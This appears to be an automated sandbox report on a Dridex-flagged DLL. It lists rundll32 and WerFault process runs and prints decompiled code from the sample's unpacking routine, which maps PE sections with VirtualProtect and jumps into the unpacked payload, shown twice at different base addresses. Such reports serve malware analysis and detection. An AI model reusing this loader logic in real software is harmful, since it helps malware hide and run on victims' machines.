                                                                                                                                              General

                                                                                                                                              Start time:21:48:12
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiAddParameter
                                                                                                                                              Imagebase:0xf90000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000012.00000002.513324135.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:48:12
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\b8fe43e6_by_Libranalysis.dll',WdiCancel
                                                                                                                                              Imagebase:0xf90000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000014.00000002.505756712.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:49:24
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 756
                                                                                                                                              Imagebase:0x50000
                                                                                                                                              File size:434592 bytes
                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Start time:21:49:28
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 756
                                                                                                                                              Imagebase:0x50000
                                                                                                                                              File size:434592 bytes
                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Start time:21:49:35
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 756
                                                                                                                                              Imagebase:0x50000
                                                                                                                                              File size:434592 bytes
                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Start time:21:49:35
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 756
                                                                                                                                              Imagebase:0x50000
                                                                                                                                              File size:434592 bytes
                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Start time:21:50:13
                                                                                                                                              Start date:04/05/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 592
                                                                                                                                              Imagebase:0x1050000
                                                                                                                                              File size:434592 bytes
                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Disassembly

                                                                                                                                              Code Analysis

                                                                                                                                              Reset < >

                                                                                                                                                Executed Functions

                                                                                                                                                C-Code - Quality: 42%
                                                                                                                                                			E00D8193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
                                                                                                                                                				char _v20;
                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				char _v44;
                                                                                                                                                				intOrPtr* _v48;
                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                				void* _v68;
                                                                                                                                                				char* _v72;
                                                                                                                                                				int _v76;
                                                                                                                                                				long _v80;
                                                                                                                                                				long _v84;
                                                                                                                                                				DWORD* _v88;
                                                                                                                                                				intOrPtr _v92;
                                                                                                                                                				int _v96;
                                                                                                                                                				intOrPtr* _v100;
                                                                                                                                                				intOrPtr _v104;
                                                                                                                                                				intOrPtr _v108;
                                                                                                                                                				intOrPtr _v112;
                                                                                                                                                				intOrPtr _v116;
                                                                                                                                                				intOrPtr _v120;
                                                                                                                                                				intOrPtr _v124;
                                                                                                                                                				void* _v128;
                                                                                                                                                				intOrPtr _v132;
                                                                                                                                                				char* _v136;
                                                                                                                                                				intOrPtr _v140;
                                                                                                                                                				intOrPtr _v144;
                                                                                                                                                				intOrPtr _v148;
                                                                                                                                                				intOrPtr _v152;
                                                                                                                                                				intOrPtr _v156;
                                                                                                                                                				int _v160;
                                                                                                                                                				intOrPtr _v164;
                                                                                                                                                				char* _v168;
                                                                                                                                                				intOrPtr _v172;
                                                                                                                                                				intOrPtr _v176;
                                                                                                                                                				char _v180;
                                                                                                                                                				intOrPtr* _t135;
                                                                                                                                                				int _t142;
                                                                                                                                                				int _t150;
                                                                                                                                                				int _t154;
                                                                                                                                                				intOrPtr _t169;
                                                                                                                                                				int _t175;
                                                                                                                                                				intOrPtr _t217;
                                                                                                                                                				void* _t224;
                                                                                                                                                				intOrPtr _t227;
                                                                                                                                                				void* _t234;
                                                                                                                                                				intOrPtr _t238;
                                                                                                                                                				intOrPtr _t245;
                                                                                                                                                				intOrPtr _t249;
                                                                                                                                                				DWORD* _t263;
                                                                                                                                                				void* _t267;
                                                                                                                                                				intOrPtr* _t270;
                                                                                                                                                				intOrPtr* _t271;
                                                                                                                                                
                                                                                                                                                				_t135 = _a4;
                                                                                                                                                				_v20 = 0;
                                                                                                                                                				_t234 =  *((intOrPtr*)(_t135 + 0x28));
                                                                                                                                                				 *0xd84418 = 1;
                                                                                                                                                				asm("movaps xmm0, [0xd83010]");
                                                                                                                                                				asm("movups [0xd84428], xmm0");
                                                                                                                                                				_v48 = _t135;
                                                                                                                                                				_v52 =  *((intOrPtr*)(_t135 + 0x44));
                                                                                                                                                				_v56 =  *((intOrPtr*)(_v48 + 0xc));
                                                                                                                                                				_v180 = _t234;
                                                                                                                                                				_v176 =  *((intOrPtr*)(_v48 + 0x48));
                                                                                                                                                				_v172 = 4;
                                                                                                                                                				_v168 =  &_v20;
                                                                                                                                                				_v60 =  *((intOrPtr*)(_t135 + 0x30));
                                                                                                                                                				_v64 = 4;
                                                                                                                                                				_v68 = _t234;
                                                                                                                                                				_v72 =  &_v20;
                                                                                                                                                				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
                                                                                                                                                				_v76 = _t142;
                                                                                                                                                				_v180 = _v68;
                                                                                                                                                				_v176 = 0;
                                                                                                                                                				_v172 =  *((intOrPtr*)(_v48 + 0x48));
                                                                                                                                                				_v80 = 0x400;
                                                                                                                                                				_v84 = 2;
                                                                                                                                                				_v88 =  &_v20;
                                                                                                                                                				_v92 = 0;
                                                                                                                                                				E00D8173B();
                                                                                                                                                				E00D821C2(_v68,  *_v48, _v60);
                                                                                                                                                				E00D8173B( *_v48, 0, _v60);
                                                                                                                                                				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                                                                                				_t270 = _t267 - 0x84;
                                                                                                                                                				_t224 = _v68;
                                                                                                                                                				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
                                                                                                                                                				_v96 = _t150;
                                                                                                                                                				_v100 = _v68 + 0x3c;
                                                                                                                                                				_v104 = _t224;
                                                                                                                                                				_v108 = _t249;
                                                                                                                                                				if(_t249 != 0) {
                                                                                                                                                					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                				}
                                                                                                                                                				_v112 = _v104;
                                                                                                                                                				if(_v56 != 0) {
                                                                                                                                                					_v116 = 0;
                                                                                                                                                					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
                                                                                                                                                					while(1) {
                                                                                                                                                						_t169 = _v120;
                                                                                                                                                						_v152 = _t169;
                                                                                                                                                						_t245 = _v152;
                                                                                                                                                						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
                                                                                                                                                						_v176 =  *((intOrPtr*)(_t245 + 8));
                                                                                                                                                						_v172 =  *((intOrPtr*)(0xd84418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
                                                                                                                                                						_v168 =  &_v20;
                                                                                                                                                						_v156 = _v116;
                                                                                                                                                						_t175 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                                                                						_t270 = _t270 - 0x10;
                                                                                                                                                						_t217 = _v156 + 1;
                                                                                                                                                						_v160 = _t175;
                                                                                                                                                						_v116 = _t217;
                                                                                                                                                						_v120 = _v152 + 0x28;
                                                                                                                                                						if(_t217 == _v56) {
                                                                                                                                                							goto L12;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				L12:
                                                                                                                                                				 *_t270 = _v68;
                                                                                                                                                				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
                                                                                                                                                				_t154 = DisableThreadLibraryCalls(??);
                                                                                                                                                				_t271 = _t270 - 4;
                                                                                                                                                				_t227 =  *_v100;
                                                                                                                                                				_v164 = _t154;
                                                                                                                                                				_v124 = _t227;
                                                                                                                                                				_v128 = _v68;
                                                                                                                                                				if(_t227 != 0) {
                                                                                                                                                					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                				}
                                                                                                                                                				_t238 = _v48;
                                                                                                                                                				_v44 =  *((intOrPtr*)(_t238 + 0x40));
                                                                                                                                                				_v40 =  *((intOrPtr*)(_t238 + 0x24));
                                                                                                                                                				_v36 =  *((intOrPtr*)(_t238 + 0x38));
                                                                                                                                                				_v32 =  *((intOrPtr*)(_t238 + 0x50));
                                                                                                                                                				_v28 =  *((intOrPtr*)(_t238 + 0x18));
                                                                                                                                                				_v24 = _v132;
                                                                                                                                                				 *_t271 = _t238;
                                                                                                                                                				_v180 = 0;
                                                                                                                                                				_v176 = 0x5c;
                                                                                                                                                				_v136 =  &_v44;
                                                                                                                                                				_v140 = 0;
                                                                                                                                                				_v144 = 0x5c;
                                                                                                                                                				_v148 =  *((intOrPtr*)(_v128 + 0x28));
                                                                                                                                                				E00D8173B();
                                                                                                                                                				if(_v148 != 0) {
                                                                                                                                                					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
                                                                                                                                                					goto __eax;
                                                                                                                                                				}
                                                                                                                                                				return 1;
                                                                                                                                                			}





























































                                                                                                                                                0x00d81949
                                                                                                                                                0x00d81957
                                                                                                                                                0x00d8195e
                                                                                                                                                0x00d81961
                                                                                                                                                0x00d8196b
                                                                                                                                                0x00d81972
                                                                                                                                                0x00d8197c
                                                                                                                                                0x00d81982
                                                                                                                                                0x00d8198b
                                                                                                                                                0x00d81994
                                                                                                                                                0x00d81997
                                                                                                                                                0x00d8199b
                                                                                                                                                0x00d819a3
                                                                                                                                                0x00d819aa
                                                                                                                                                0x00d819ad
                                                                                                                                                0x00d819b0
                                                                                                                                                0x00d819b3
                                                                                                                                                0x00d819b6
                                                                                                                                                0x00d819d0
                                                                                                                                                0x00d819d6
                                                                                                                                                0x00d819d9
                                                                                                                                                0x00d819e1
                                                                                                                                                0x00d819e5
                                                                                                                                                0x00d819e8
                                                                                                                                                0x00d819eb
                                                                                                                                                0x00d819ee
                                                                                                                                                0x00d819f1
                                                                                                                                                0x00d81a0c
                                                                                                                                                0x00d81a28
                                                                                                                                                0x00d81a4d
                                                                                                                                                0x00d81a4f
                                                                                                                                                0x00d81a58
                                                                                                                                                0x00d81a5b
                                                                                                                                                0x00d81a65
                                                                                                                                                0x00d81a68
                                                                                                                                                0x00d81a6b
                                                                                                                                                0x00d81a6e
                                                                                                                                                0x00d81a71
                                                                                                                                                0x00d81a8c
                                                                                                                                                0x00d81a8c
                                                                                                                                                0x00d81b76
                                                                                                                                                0x00d81b79
                                                                                                                                                0x00d81aa5
                                                                                                                                                0x00d81aa8
                                                                                                                                                0x00d81b84
                                                                                                                                                0x00d81b84
                                                                                                                                                0x00d81b9b
                                                                                                                                                0x00d81bc3
                                                                                                                                                0x00d81bcf
                                                                                                                                                0x00d81bd2
                                                                                                                                                0x00d81bd6
                                                                                                                                                0x00d81bda
                                                                                                                                                0x00d81be1
                                                                                                                                                0x00d81be7
                                                                                                                                                0x00d81be9
                                                                                                                                                0x00d81bf2
                                                                                                                                                0x00d81c03
                                                                                                                                                0x00d81c09
                                                                                                                                                0x00d81c0c
                                                                                                                                                0x00d81c0f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00d81c11
                                                                                                                                                0x00d81b84
                                                                                                                                                0x00d81c31
                                                                                                                                                0x00d81c3f
                                                                                                                                                0x00d81c47
                                                                                                                                                0x00d81c4a
                                                                                                                                                0x00d81c4c
                                                                                                                                                0x00d81c52
                                                                                                                                                0x00d81c5e
                                                                                                                                                0x00d81c64
                                                                                                                                                0x00d81c67
                                                                                                                                                0x00d81c6a
                                                                                                                                                0x00d81ae4
                                                                                                                                                0x00d81ae4
                                                                                                                                                0x00d81af7
                                                                                                                                                0x00d81afd
                                                                                                                                                0x00d81b03
                                                                                                                                                0x00d81b09
                                                                                                                                                0x00d81b0f
                                                                                                                                                0x00d81b15
                                                                                                                                                0x00d81b1b
                                                                                                                                                0x00d81b1e
                                                                                                                                                0x00d81b21
                                                                                                                                                0x00d81b29
                                                                                                                                                0x00d81b31
                                                                                                                                                0x00d81b37
                                                                                                                                                0x00d81b3d
                                                                                                                                                0x00d81b43
                                                                                                                                                0x00d81b49
                                                                                                                                                0x00d81b57
                                                                                                                                                0x00d81c24
                                                                                                                                                0x00d81c2a
                                                                                                                                                0x00d81c2a
                                                                                                                                                0x00d81ac9

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.586066029.0000000000D80000.00000040.00000001.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID: \
                                                                                                                                                • API String ID: 544645111-2967466578
                                                                                                                                                • Opcode ID: 68e451add8f1b058860ed6ed4102af8e59f1d4461e7e84dbc84b7c0278295e4f
                                                                                                                                                • Instruction ID: edccf5136509d2335b028767ebcaed34f7665df245a940780d3ce7768e9cad0c
                                                                                                                                                • Opcode Fuzzy Hash: 68e451add8f1b058860ed6ed4102af8e59f1d4461e7e84dbc84b7c0278295e4f
                                                                                                                                                • Instruction Fuzzy Hash: 60B19CB8D003188FCB14DFA9C980A9DFBF1BF88310F55856AE959AB351D330A946CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.586066029.0000000000D80000.00000040.00000001.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                                                                • Instruction ID: b4e180d0847581afaf3093d16eafff3097057bcf0d135427aa9ca50a038f197a
                                                                                                                                                • Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                                                                • Instruction Fuzzy Hash: 3A41B2B5E042199FDB04DFA8C490AAEBBF1FF48714F148529E948AB341D375A845CFA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                Executed Functions

                                                                                                                                                C-Code - Quality: 42%
                                                                                                                                                			E00F4193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
                                                                                                                                                				char _v20;
                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				char _v44;
                                                                                                                                                				intOrPtr* _v48;
                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                				void* _v68;
                                                                                                                                                				char* _v72;
                                                                                                                                                				int _v76;
                                                                                                                                                				long _v80;
                                                                                                                                                				long _v84;
                                                                                                                                                				DWORD* _v88;
                                                                                                                                                				intOrPtr _v92;
                                                                                                                                                				int _v96;
                                                                                                                                                				intOrPtr* _v100;
                                                                                                                                                				intOrPtr _v104;
                                                                                                                                                				intOrPtr _v108;
                                                                                                                                                				intOrPtr _v112;
                                                                                                                                                				intOrPtr _v116;
                                                                                                                                                				intOrPtr _v120;
                                                                                                                                                				intOrPtr _v124;
                                                                                                                                                				void* _v128;
                                                                                                                                                				intOrPtr _v132;
                                                                                                                                                				char* _v136;
                                                                                                                                                				intOrPtr _v140;
                                                                                                                                                				intOrPtr _v144;
                                                                                                                                                				intOrPtr _v148;
                                                                                                                                                				intOrPtr _v152;
                                                                                                                                                				intOrPtr _v156;
                                                                                                                                                				int _v160;
                                                                                                                                                				intOrPtr _v164;
                                                                                                                                                				char* _v168;
                                                                                                                                                				intOrPtr _v172;
                                                                                                                                                				intOrPtr _v176;
                                                                                                                                                				char _v180;
                                                                                                                                                				intOrPtr* _t135;
                                                                                                                                                				int _t142;
                                                                                                                                                				int _t150;
                                                                                                                                                				int _t154;
                                                                                                                                                				intOrPtr _t169;
                                                                                                                                                				int _t175;
                                                                                                                                                				intOrPtr _t217;
                                                                                                                                                				void* _t224;
                                                                                                                                                				intOrPtr _t227;
                                                                                                                                                				void* _t234;
                                                                                                                                                				intOrPtr _t238;
                                                                                                                                                				intOrPtr _t245;
                                                                                                                                                				intOrPtr _t249;
                                                                                                                                                				DWORD* _t263;
                                                                                                                                                				void* _t267;
                                                                                                                                                				intOrPtr* _t270;
                                                                                                                                                				intOrPtr* _t271;
                                                                                                                                                
                                                                                                                                                				_t135 = _a4;
                                                                                                                                                				_v20 = 0;
                                                                                                                                                				_t234 =  *((intOrPtr*)(_t135 + 0x28));
                                                                                                                                                				 *0xf44418 = 1;
                                                                                                                                                				asm("movaps xmm0, [0xf43010]");
                                                                                                                                                				asm("movups [0xf44428], xmm0");
                                                                                                                                                				_v48 = _t135;
                                                                                                                                                				_v52 =  *((intOrPtr*)(_t135 + 0x44));
                                                                                                                                                				_v56 =  *((intOrPtr*)(_v48 + 0xc));
                                                                                                                                                				_v180 = _t234;
                                                                                                                                                				_v176 =  *((intOrPtr*)(_v48 + 0x48));
                                                                                                                                                				_v172 = 4;
                                                                                                                                                				_v168 =  &_v20;
                                                                                                                                                				_v60 =  *((intOrPtr*)(_t135 + 0x30));
                                                                                                                                                				_v64 = 4;
                                                                                                                                                				_v68 = _t234;
                                                                                                                                                				_v72 =  &_v20;
                                                                                                                                                				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
                                                                                                                                                				_v76 = _t142;
                                                                                                                                                				_v180 = _v68;
                                                                                                                                                				_v176 = 0;
                                                                                                                                                				_v172 =  *((intOrPtr*)(_v48 + 0x48));
                                                                                                                                                				_v80 = 0x400;
                                                                                                                                                				_v84 = 2;
                                                                                                                                                				_v88 =  &_v20;
                                                                                                                                                				_v92 = 0;
                                                                                                                                                				E00F4173B();
                                                                                                                                                				E00F421C2(_v68,  *_v48, _v60);
                                                                                                                                                				E00F4173B( *_v48, 0, _v60);
                                                                                                                                                				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                                                                                				_t270 = _t267 - 0x84;
                                                                                                                                                				_t224 = _v68;
                                                                                                                                                				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
                                                                                                                                                				_v96 = _t150;
                                                                                                                                                				_v100 = _v68 + 0x3c;
                                                                                                                                                				_v104 = _t224;
                                                                                                                                                				_v108 = _t249;
                                                                                                                                                				if(_t249 != 0) {
                                                                                                                                                					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                				}
                                                                                                                                                				_v112 = _v104;
                                                                                                                                                				if(_v56 != 0) {
                                                                                                                                                					_v116 = 0;
                                                                                                                                                					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
                                                                                                                                                					while(1) {
                                                                                                                                                						_t169 = _v120;
                                                                                                                                                						_v152 = _t169;
                                                                                                                                                						_t245 = _v152;
                                                                                                                                                						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
                                                                                                                                                						_v176 =  *((intOrPtr*)(_t245 + 8));
                                                                                                                                                						_v172 =  *((intOrPtr*)(0xf44418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
                                                                                                                                                						_v168 =  &_v20;
                                                                                                                                                						_v156 = _v116;
                                                                                                                                                						_t175 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                                                                						_t270 = _t270 - 0x10;
                                                                                                                                                						_t217 = _v156 + 1;
                                                                                                                                                						_v160 = _t175;
                                                                                                                                                						_v116 = _t217;
                                                                                                                                                						_v120 = _v152 + 0x28;
                                                                                                                                                						if(_t217 == _v56) {
                                                                                                                                                							goto L12;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				L12:
                                                                                                                                                				 *_t270 = _v68;
                                                                                                                                                				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
                                                                                                                                                				_t154 = DisableThreadLibraryCalls(??);
                                                                                                                                                				_t271 = _t270 - 4;
                                                                                                                                                				_t227 =  *_v100;
                                                                                                                                                				_v164 = _t154;
                                                                                                                                                				_v124 = _t227;
                                                                                                                                                				_v128 = _v68;
                                                                                                                                                				if(_t227 != 0) {
                                                                                                                                                					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                				}
                                                                                                                                                				_t238 = _v48;
                                                                                                                                                				_v44 =  *((intOrPtr*)(_t238 + 0x40));
                                                                                                                                                				_v40 =  *((intOrPtr*)(_t238 + 0x24));
                                                                                                                                                				_v36 =  *((intOrPtr*)(_t238 + 0x38));
                                                                                                                                                				_v32 =  *((intOrPtr*)(_t238 + 0x50));
                                                                                                                                                				_v28 =  *((intOrPtr*)(_t238 + 0x18));
                                                                                                                                                				_v24 = _v132;
                                                                                                                                                				 *_t271 = _t238;
                                                                                                                                                				_v180 = 0;
                                                                                                                                                				_v176 = 0x5c;
                                                                                                                                                				_v136 =  &_v44;
                                                                                                                                                				_v140 = 0;
                                                                                                                                                				_v144 = 0x5c;
                                                                                                                                                				_v148 =  *((intOrPtr*)(_v128 + 0x28));
                                                                                                                                                				E00F4173B();
                                                                                                                                                				if(_v148 != 0) {
                                                                                                                                                					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
                                                                                                                                                					goto __eax;
                                                                                                                                                				}
                                                                                                                                                				return 1;
                                                                                                                                                			}





























































                                                                                                                                                0x00f41949
                                                                                                                                                0x00f41957
                                                                                                                                                0x00f4195e
                                                                                                                                                0x00f41961
                                                                                                                                                0x00f4196b
                                                                                                                                                0x00f41972
                                                                                                                                                0x00f4197c
                                                                                                                                                0x00f41982
                                                                                                                                                0x00f4198b
                                                                                                                                                0x00f41994
                                                                                                                                                0x00f41997
                                                                                                                                                0x00f4199b
                                                                                                                                                0x00f419a3
                                                                                                                                                0x00f419aa
                                                                                                                                                0x00f419ad
                                                                                                                                                0x00f419b0
                                                                                                                                                0x00f419b3
                                                                                                                                                0x00f419b6
                                                                                                                                                0x00f419d0
                                                                                                                                                0x00f419d6
                                                                                                                                                0x00f419d9
                                                                                                                                                0x00f419e1
                                                                                                                                                0x00f419e5
                                                                                                                                                0x00f419e8
                                                                                                                                                0x00f419eb
                                                                                                                                                0x00f419ee
                                                                                                                                                0x00f419f1
                                                                                                                                                0x00f41a0c
                                                                                                                                                0x00f41a28
                                                                                                                                                0x00f41a4d
                                                                                                                                                0x00f41a4f
                                                                                                                                                0x00f41a58
                                                                                                                                                0x00f41a5b
                                                                                                                                                0x00f41a65
                                                                                                                                                0x00f41a68
                                                                                                                                                0x00f41a6b
                                                                                                                                                0x00f41a6e
                                                                                                                                                0x00f41a71
                                                                                                                                                0x00f41a8c
                                                                                                                                                0x00f41a8c
                                                                                                                                                0x00f41b76
                                                                                                                                                0x00f41b79
                                                                                                                                                0x00f41aa5
                                                                                                                                                0x00f41aa8
                                                                                                                                                0x00f41b84
                                                                                                                                                0x00f41b84
                                                                                                                                                0x00f41b9b
                                                                                                                                                0x00f41bc3
                                                                                                                                                0x00f41bcf
                                                                                                                                                0x00f41bd2
                                                                                                                                                0x00f41bd6
                                                                                                                                                0x00f41bda
                                                                                                                                                0x00f41be1
                                                                                                                                                0x00f41be7
                                                                                                                                                0x00f41be9
                                                                                                                                                0x00f41bf2
                                                                                                                                                0x00f41c03
                                                                                                                                                0x00f41c09
                                                                                                                                                0x00f41c0c
                                                                                                                                                0x00f41c0f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00f41c11
                                                                                                                                                0x00f41b84
                                                                                                                                                0x00f41c31
                                                                                                                                                0x00f41c3f
                                                                                                                                                0x00f41c47
                                                                                                                                                0x00f41c4a
                                                                                                                                                0x00f41c4c
                                                                                                                                                0x00f41c52
                                                                                                                                                0x00f41c5e
                                                                                                                                                0x00f41c64
                                                                                                                                                0x00f41c67
                                                                                                                                                0x00f41c6a
                                                                                                                                                0x00f41ae4
                                                                                                                                                0x00f41ae4
                                                                                                                                                0x00f41af7
                                                                                                                                                0x00f41afd
                                                                                                                                                0x00f41b03
                                                                                                                                                0x00f41b09
                                                                                                                                                0x00f41b0f
                                                                                                                                                0x00f41b15
                                                                                                                                                0x00f41b1b
                                                                                                                                                0x00f41b1e
                                                                                                                                                0x00f41b21
                                                                                                                                                0x00f41b29
                                                                                                                                                0x00f41b31
                                                                                                                                                0x00f41b37
                                                                                                                                                0x00f41b3d
                                                                                                                                                0x00f41b43
                                                                                                                                                0x00f41b49
                                                                                                                                                0x00f41b57
                                                                                                                                                0x00f41c24
                                                                                                                                                0x00f41c2a
                                                                                                                                                0x00f41c2a
                                                                                                                                                0x00f41ac9

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.322178524.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID: \
                                                                                                                                                • API String ID: 544645111-2967466578
                                                                                                                                                • Opcode ID: ec154a739927c03d42ae1edef91f8e827761d7df77ef73179f198e594e380271
                                                                                                                                                • Instruction ID: d9eddc4d6b0e61bbd56f700682cc2b51b158ac479ad422eeb23f0c3cab21e065
                                                                                                                                                • Opcode Fuzzy Hash: ec154a739927c03d42ae1edef91f8e827761d7df77ef73179f198e594e380271
                                                                                                                                                • Instruction Fuzzy Hash: 02B19CB5D002188FCB14CFA9C980A9DFBF1FF88310F55856AE959AB352D334A981DF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.322178524.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
